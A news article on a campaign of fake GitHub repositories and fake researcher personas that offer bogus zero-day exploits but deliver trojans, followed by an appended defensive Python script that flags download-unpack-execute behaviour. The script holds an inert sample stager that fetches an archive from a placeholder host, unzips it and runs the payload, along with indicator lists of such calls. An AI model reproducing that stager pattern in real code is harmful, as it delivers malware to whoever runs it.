In an unusual attack campaign, a hacker has been setting up rogue GitHub repositories that claim to host zero-day exploits for popular applications but which instead deliver malware. The attacker also created fake GitHub and Twitter accounts posing as security researchers and even used real photos of researchers from well-known cybersecurity companies.
"The attacker has put a lot of effort into creating all these fake personas, only to deliver very obvious malware," researchers from security firm VulnCheck, who found the rogue repositories, said in a report. "It's unclear if they've been successful but given that they've continued to pursue this avenue of attacks, it seems they believe they will be successful."
While attacks that target security researchers are not a new development, they are relatively rare and more likely to be the work of advanced persistent threat (APT) groups seeking access to the sensitive information researchers hold. This was the case with a campaign reported by Google's Threat Analysis Group in 2021 where a government-backed North Korean entity created a web of fake accounts posing as security researchers on Twitter, Telegram, LinkedIn, and other social media platforms and used them to promote proof-of-concept exploits for existing vulnerabilities that were posted on a blog and in YouTube videos.
How the GitHub fake account campaign works
The fake accounts were used to contact other real researchers and invite them to collaborate. As part of the communication, a Visual Studio project with proof-of-concept exploit code was shared, but this project also included a malicious DLL that deployed malware on the victim's computer. Separately, some researchers who visited the blog had their fully patched systems exploited, suggesting the attackers had access to zero-day exploits.
VulnCheck came across the first rogue repository in early May and reported it to GitHub, which promptly took it down. That repository claimed to host a zero-day remote code execution exploit for Signal, a popular secure communications app that is well regarded in the security community. The attacker then continued to set up new accounts and repositories with fake exploits for Microsoft Exchange, Google Chrome, Discord, and Chromium.
All were set up by fake accounts claiming to belong to researchers who work for a company called High Sierra Cyber Security that does not appear to exist. Some of the same names and profile information were used to create Twitter accounts that were then used to promote the repositories, much like in the attack reported by Google.
However, the 2021 attack appears to have involved significantly more sophistication than this latest campaign and there is no evidence it is the work of the same attackers. The malicious code distributed from the rogue GitHub repositories as a file called poc.py downloads one of two additional files depending on the operating system, one called cveslinux.zip and one called cveswindows.zip. These archives are then unpacked and the file inside is executed. The Windows payload is detected by 36 antivirus engines on VirusTotal as a trojan, while the Linux binary is flagged by 25.
"It isn't clear if this is a single individual with too much time on their hands or something more advanced like the campaign uncovered by Google TAG in January 2021," the VulnCheck researchers said. "Either way, security researchers should understand that they are useful targets for malicious actors and should be cautious when downloading code from GitHub. Always review the code you are executing and don't use anything you don't understand."
Experienced security researchers typically take precautions when working with potentially malicious code. If they are testing a proof-of-concept exploit, that is most likely to happen on a test system inside a virtual machine that is well monitored and later wiped. Executing such code on a work machine would most likely violate standard security policies in most organizations, especially within a cybersecurity company.
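As an added example (not from the article or VulnCheck) of the "review the code before you run it" advice, the following static triage script walks a PoC's Python AST and flags the download-unpack-execute pattern the article attributes to poc.py. The SAMPLE_POC string is a constructed, inert stand-in with a placeholder URL; the indicator name lists are assumptions and will need extending for other libraries.

```python
import ast

# Indicator families for the behaviour described: choose by OS, fetch, unpack, execute.
INDICATORS = {
    "os_branch": {"platform.system", "sys.platform", "os.name"},
    "download": {"urllib.request.urlretrieve", "urllib.request.urlopen", "requests.get"},
    "unpack": {"zipfile.ZipFile", "tarfile.open", "shutil.unpack_archive"},
    "execute": {"subprocess.run", "subprocess.Popen", "subprocess.call",
                "os.system", "os.startfile"},
}

# Constructed, inert stand-in for the described pattern (placeholder URL, only parsed).
SAMPLE_POC = '''\
import platform, subprocess, urllib.request, zipfile
archive = "cveswindows.zip" if platform.system() == "Windows" else "cveslinux.zip"
urllib.request.urlretrieve("https://example.invalid/" + archive, archive)
zipfile.ZipFile(archive).extractall("out")
subprocess.run(["out/payload"])
'''

def _dotted(node):
    """Return 'a.b.c' for an Attribute/Name chain, else None."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None

def triage(source: str) -> dict:
    """Map each indicator family to the dotted names referenced in `source`."""
    seen = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, (ast.Attribute, ast.Name)):
            seen.add(_dotted(node))
        elif isinstance(node, ast.ImportFrom) and node.module:
            seen.update(f"{node.module}.{a.name}" for a in node.names)  # from X import Y
    return {fam: seen & names for fam, names in INDICATORS.items()}

def is_stager_like(source: str) -> bool:
    """Flag for manual review when download, unpack and execute all co-occur."""
    hits = triage(source)
    return all(hits[fam] for fam in ("download", "unpack", "execute"))

if __name__ == "__main__":
    for fam, names in triage(SAMPLE_POC).items():
        print(f"{fam:10s} {sorted(names)}")
    print("stager-like:", is_stager_like(SAMPLE_POC))
```

A hit only means "read this part closely"; a genuine PoC that merely sends an HTTP request to a target is not flagged because it has no unpack or execute step.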
Copyright © 2023 IDG Communications, Inc.